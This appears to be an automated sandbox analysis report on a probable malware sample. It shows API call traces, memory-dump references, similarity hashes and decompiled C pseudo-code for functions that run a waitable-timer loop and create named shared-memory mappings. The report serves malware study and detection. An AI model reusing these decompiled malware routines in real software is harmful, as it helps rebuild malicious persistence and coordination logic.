                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04F613F3
                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(05929570), ref: 04F61407
                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(05929570), ref: 04F61425
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F61EFB,?,059295B0), ref: 04F61A5B
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrlen.KERNEL32(?,?,?,04F61EFB,?,059295B0), ref: 04F61A63
                                                                                                                                                                                                      • Part of subcall function 04F61A30: strcpy.NTDLL ref: 04F61A7A
                                                                                                                                                                                                      • Part of subcall function 04F61A30: lstrcat.KERNEL32(00000000,?), ref: 04F61A85
                                                                                                                                                                                                      • Part of subcall function 04F61A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F61EFB,?,059295B0), ref: 04F61AA2
                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,04F6C2A4,?,059295B0), ref: 04F6145C
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrlen.KERNEL32(?,00000000,00000000,04F61F32,616D692F,00000000), ref: 04F6277F
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrlen.KERNEL32(?), ref: 04F62787
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrcpy.KERNEL32(00000000,?), ref: 04F6279E
                                                                                                                                                                                                      • Part of subcall function 04F62773: lstrcat.KERNEL32(00000000,?), ref: 04F627A9
                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 04F61489
                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 04F61491
                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 04F6149F
                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 04F614A5
                                                                                                                                                                                                      • Part of subcall function 04F6978C: lstrlen.KERNEL32(?,00000000,04F6D330,00000001,04F63435,04F6D00C,04F6D00C,00000000,00000005,00000000,00000000,?,?,?,04F6568F,04F65073), ref: 04F69795
                                                                                                                                                                                                      • Part of subcall function 04F6978C: mbstowcs.NTDLL ref: 04F697BC
                                                                                                                                                                                                      • Part of subcall function 04F6978C: memset.NTDLL ref: 04F697CE
                                                                                                                                                                                                    • wcstombs.NTDLL ref: 04F61538
                                                                                                                                                                                                      • Part of subcall function 04F69561: SysAllocString.OLEAUT32(?), ref: 04F6959C
                                                                                                                                                                                                      • Part of subcall function 04F69561: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04F6961F
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 04F61579
                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 04F61585
                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,?,059295B0), ref: 04F61591
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 04F6159D
                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 04F615A9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 603507560-0
                                                                                                                                                                                                    • Opcode ID: f390a9ad5084c6976a430f298377a61251d00430eeda5b070848b8494e169727
                                                                                                                                                                                                    • Instruction ID: 594e247ed1f849d80a224af1991304bc4bbe4a148c6d26885c08c909bc7891e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f390a9ad5084c6976a430f298377a61251d00430eeda5b070848b8494e169727
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22912971A00108FFDB11DFA8ED48A9ABBB9EF08314F154054F85AD7260DB39ED52DB60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E04F627F7(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				struct %anon52 _v8;
                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                    				void _v88;
                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                    				struct %anon52 _t46;
                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                    				long _t53;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				struct %anon52 _t60;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				void** _t78;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t73 = __edx;
                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                    				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                    				_v44 = _t46;
                                                                                                                                                                                                    				if(_t46 == 0) {
                                                                                                                                                                                                    					_v8.LowPart = GetLastError();
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                    					_push(0xff676980);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push( *0x4f6d240);
                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                    					L04F6B048();
                                                                                                                                                                                                    					_v36.LowPart = _t46;
                                                                                                                                                                                                    					_v32 = _t73;
                                                                                                                                                                                                    					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                    					_t51 =  *0x4f6d26c; // 0x374
                                                                                                                                                                                                    					_v40 = _t51;
                                                                                                                                                                                                    					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                    					_v8.LowPart = _t53;
                                                                                                                                                                                                    					if(_t53 == 0) {
                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							 *0x4f6d24c = 5;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t68 = E04F65C8C(); // executed
                                                                                                                                                                                                    							if(_t68 != 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x4f6d260 & 0x00000001) == 0) {
                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 = _v12;
                                                                                                                                                                                                    						_t58 = _t71 << 4;
                                                                                                                                                                                                    						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                    						_t72 = _t71 + 1;
                                                                                                                                                                                                    						_v24 = _t71 + 1;
                                                                                                                                                                                                    						_t60 = E04F69425(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                                                                                                                                                                    						_v8.LowPart = _t60;
                                                                                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t65 = _v24;
                                                                                                                                                                                                    						_v12 = _t65;
                                                                                                                                                                                                    						_t90 = _t65 - 3;
                                                                                                                                                                                                    						if(_t65 != 3) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_v8.LowPart = E04F64CBE(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                    						if(_t60 != 0x10d2) {
                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push( *0x4f6d244);
                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags =  *0x4f6d248; // 0x0
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t60 = E04F65BEA();
                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push( *0x4f6d248);
                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                    								L04F6B048();
                                                                                                                                                                                                    								_v36.LowPart = _t60;
                                                                                                                                                                                                    								_v32 = _t76;
                                                                                                                                                                                                    								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                    								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                    								_v8.LowPart = _t64;
                                                                                                                                                                                                    								__eflags = _t64;
                                                                                                                                                                                                    								if(_t64 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t78 =  &_v92;
                                                                                                                                                                                                    					_t70 = 3;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t54 =  *_t78;
                                                                                                                                                                                                    						if(_t54 != 0) {
                                                                                                                                                                                                    							HeapFree( *0x4f6d238, 0, _t54);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t78 =  &(_t78[4]);
                                                                                                                                                                                                    						_t70 = _t70 - 1;
                                                                                                                                                                                                    					} while (_t70 != 0);
                                                                                                                                                                                                    					CloseHandle(_v44);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x04f627f7
                                                                                                                                                                                                    0x04f62809
                                                                                                                                                                                                    0x04f6280c
                                                                                                                                                                                                    0x04f62818
                                                                                                                                                                                                    0x04f6281e
                                                                                                                                                                                                    0x04f62823
                                                                                                                                                                                                    0x04f6298a
                                                                                                                                                                                                    0x04f62829
                                                                                                                                                                                                    0x04f62829
                                                                                                                                                                                                    0x04f6282b
                                                                                                                                                                                                    0x04f62830
                                                                                                                                                                                                    0x04f62831
                                                                                                                                                                                                    0x04f62837
                                                                                                                                                                                                    0x04f6283a
                                                                                                                                                                                                    0x04f6283d
                                                                                                                                                                                                    0x04f6284b
                                                                                                                                                                                                    0x04f62856
                                                                                                                                                                                                    0x04f62859
                                                                                                                                                                                                    0x04f6285b
                                                                                                                                                                                                    0x04f62868
                                                                                                                                                                                                    0x04f62872
                                                                                                                                                                                                    0x04f62874
                                                                                                                                                                                                    0x04f62879
                                                                                                                                                                                                    0x04f6287e
                                                                                                                                                                                                    0x04f62889
                                                                                                                                                                                                    0x04f62889
                                                                                                                                                                                                    0x04f62880
                                                                                                                                                                                                    0x04f62880
                                                                                                                                                                                                    0x04f62887
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62887
                                                                                                                                                                                                    0x04f62893
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62896
                                                                                                                                                                                                    0x04f6289a
                                                                                                                                                                                                    0x04f628a5
                                                                                                                                                                                                    0x04f628a5
                                                                                                                                                                                                    0x04f628ac
                                                                                                                                                                                                    0x04f628b5
                                                                                                                                                                                                    0x04f628bc
                                                                                                                                                                                                    0x04f628c5
                                                                                                                                                                                                    0x04f628c8
                                                                                                                                                                                                    0x04f628cb
                                                                                                                                                                                                    0x04f628d0
                                                                                                                                                                                                    0x04f628d5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f628d7
                                                                                                                                                                                                    0x04f628da
                                                                                                                                                                                                    0x04f628dd
                                                                                                                                                                                                    0x04f628e0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f628e2
                                                                                                                                                                                                    0x04f628f1
                                                                                                                                                                                                    0x04f628f1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6291f
                                                                                                                                                                                                    0x04f6291f
                                                                                                                                                                                                    0x04f62924
                                                                                                                                                                                                    0x04f62943
                                                                                                                                                                                                    0x04f62945
                                                                                                                                                                                                    0x04f6294a
                                                                                                                                                                                                    0x04f6294b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62926
                                                                                                                                                                                                    0x04f62926
                                                                                                                                                                                                    0x04f6292c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6292e
                                                                                                                                                                                                    0x04f6292e
                                                                                                                                                                                                    0x04f62933
                                                                                                                                                                                                    0x04f62935
                                                                                                                                                                                                    0x04f6293a
                                                                                                                                                                                                    0x04f6293b
                                                                                                                                                                                                    0x04f62951
                                                                                                                                                                                                    0x04f62951
                                                                                                                                                                                                    0x04f62959
                                                                                                                                                                                                    0x04f62964
                                                                                                                                                                                                    0x04f62967
                                                                                                                                                                                                    0x04f62972
                                                                                                                                                                                                    0x04f62974
                                                                                                                                                                                                    0x04f62977
                                                                                                                                                                                                    0x04f62979
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6297f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6297f
                                                                                                                                                                                                    0x04f62979
                                                                                                                                                                                                    0x04f6292c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62924
                                                                                                                                                                                                    0x04f628f4
                                                                                                                                                                                                    0x04f628f6
                                                                                                                                                                                                    0x04f628f9
                                                                                                                                                                                                    0x04f628fa
                                                                                                                                                                                                    0x04f628fa
                                                                                                                                                                                                    0x04f628fe
                                                                                                                                                                                                    0x04f62908
                                                                                                                                                                                                    0x04f62908
                                                                                                                                                                                                    0x04f6290e
                                                                                                                                                                                                    0x04f62911
                                                                                                                                                                                                    0x04f62911
                                                                                                                                                                                                    0x04f62917
                                                                                                                                                                                                    0x04f62917
                                                                                                                                                                                                    0x04f62994
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.NTDLL ref: 04F6280C
                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F62818
                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F6283D
                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04F62859
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F62872
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F62908
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 04F62917
                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F62951
                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04F650A1,?), ref: 04F62967
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F62972
                                                                                                                                                                                                      • Part of subcall function 04F65C8C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05929378,00000000,?,7519F710,00000000,7519F730), ref: 04F65CDB
                                                                                                                                                                                                      • Part of subcall function 04F65C8C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,059293B0,?,00000000,30314549,00000014,004F0053,0592936C), ref: 04F65D78
                                                                                                                                                                                                      • Part of subcall function 04F65C8C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F62885), ref: 04F65D8A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F62984
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                    • Opcode ID: 58b368d7234bcf5b90da0b526616f0a90f8d54f2c1ec678314f13e0fa40e2a0c
                                                                                                                                                                                                    • Instruction ID: f0cb91fcea7c46a5c944cc2aff56c5110c11b3672ae8cc4c49422a917ff96ee4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58b368d7234bcf5b90da0b526616f0a90f8d54f2c1ec678314f13e0fa40e2a0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4516B71D01229FBDB10EFA5EC44DEEBFB8EF49724F104656E416E2184D634AA41DBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                    			E00401266(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                    				L00402070();
                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                    				_t15 =  *0x404144;
                                                                                                                                                                                                    				_push(_t15 + 0x40505e);
                                                                                                                                                                                                    				_push(_t15 + 0x405054);
                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                    				L0040206A();
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x404148, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                    				_t34 = _t19;
                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x00401266
                                                                                                                                                                                                    0x0040126f
                                                                                                                                                                                                    0x00401273
                                                                                                                                                                                                    0x00401279
                                                                                                                                                                                                    0x0040127e
                                                                                                                                                                                                    0x00401283
                                                                                                                                                                                                    0x00401286
                                                                                                                                                                                                    0x00401289
                                                                                                                                                                                                    0x0040128e
                                                                                                                                                                                                    0x0040128f
                                                                                                                                                                                                    0x00401292
                                                                                                                                                                                                    0x0040129d
                                                                                                                                                                                                    0x004012a4
                                                                                                                                                                                                    0x004012a8
                                                                                                                                                                                                    0x004012aa
                                                                                                                                                                                                    0x004012ab
                                                                                                                                                                                                    0x004012ae
                                                                                                                                                                                                    0x004012b3
                                                                                                                                                                                                    0x004012bd
                                                                                                                                                                                                    0x004012bf
                                                                                                                                                                                                    0x004012bf
                                                                                                                                                                                                    0x004012d3
                                                                                                                                                                                                    0x004012d9
                                                                                                                                                                                                    0x004012dd
                                                                                                                                                                                                    0x0040132d
                                                                                                                                                                                                    0x004012df
                                                                                                                                                                                                    0x004012e8
                                                                                                                                                                                                    0x004012fe
                                                                                                                                                                                                    0x00401306
                                                                                                                                                                                                    0x00401318
                                                                                                                                                                                                    0x0040131c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401308
                                                                                                                                                                                                    0x0040130b
                                                                                                                                                                                                    0x00401310
                                                                                                                                                                                                    0x00401312
                                                                                                                                                                                                    0x00401312
                                                                                                                                                                                                    0x004012f3
                                                                                                                                                                                                    0x004012f5
                                                                                                                                                                                                    0x0040131e
                                                                                                                                                                                                    0x0040131f
                                                                                                                                                                                                    0x0040131f
                                                                                                                                                                                                    0x004012e8
                                                                                                                                                                                                    0x00401335

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,004013B7,0000000A,?,?), ref: 00401273
                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401289
                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 004012AE
                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 004012D3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004013B7,0000000A,?), ref: 004012EA
                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 004012FE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004013B7,0000000A,?), ref: 00401316
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004013B7,0000000A), ref: 0040131F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004013B7,0000000A,?), ref: 00401327
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                    • Opcode ID: b4fd10cf4c366ab608f71d7bcca29c01383dafdcc6e690221309366c165cc7f8
                                                                                                                                                                                                    • Instruction ID: f84ff29ebaa4c56a8b1aaa846272942f4fabc562562584d2ff14e78ab2c8c631
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fd10cf4c366ab608f71d7bcca29c01383dafdcc6e690221309366c165cc7f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21C8B2600108BFD710AFA8DC84E9F77ADEB44351F10407AFA15F71E0D67499458B68
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E04F665B1(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				struct _FILETIME* _v12;
                                                                                                                                                                                                    				short _v56;
                                                                                                                                                                                                    				struct _FILETIME* _t12;
                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __edx;
                                                                                                                                                                                                    				_t12 =  &_v12;
                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                    				L04F6B042();
                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                    				_t13 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    				_t5 = _t13 + 0x4f6e862; // 0x5928e0a
                                                                                                                                                                                                    				_t6 = _t13 + 0x4f6e59c; // 0x530025
                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                    				_push( &_v56);
                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                    				L04F6ACDA();
                                                                                                                                                                                                    				_t17 = CreateFileMappingW(0xffffffff, 0x4f6d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                    				_t30 = _t17;
                                                                                                                                                                                                    				if(_t30 == 0) {
                                                                                                                                                                                                    					_t28 = GetLastError();
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							_t28 = GetLastError();
                                                                                                                                                                                                    							if(_t28 != 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *_a4 = _t30;
                                                                                                                                                                                                    							 *_a8 = _t21;
                                                                                                                                                                                                    							_t28 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t28 = 2;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						CloseHandle(_t30);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t28;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x04f665b1
                                                                                                                                                                                                    0x04f665b9
                                                                                                                                                                                                    0x04f665bd
                                                                                                                                                                                                    0x04f665c3
                                                                                                                                                                                                    0x04f665c8
                                                                                                                                                                                                    0x04f665cd
                                                                                                                                                                                                    0x04f665d0
                                                                                                                                                                                                    0x04f665d3
                                                                                                                                                                                                    0x04f665d8
                                                                                                                                                                                                    0x04f665d9
                                                                                                                                                                                                    0x04f665dc
                                                                                                                                                                                                    0x04f665e1
                                                                                                                                                                                                    0x04f665e8
                                                                                                                                                                                                    0x04f665f2
                                                                                                                                                                                                    0x04f665f4
                                                                                                                                                                                                    0x04f665f5
                                                                                                                                                                                                    0x04f665f8
                                                                                                                                                                                                    0x04f66614
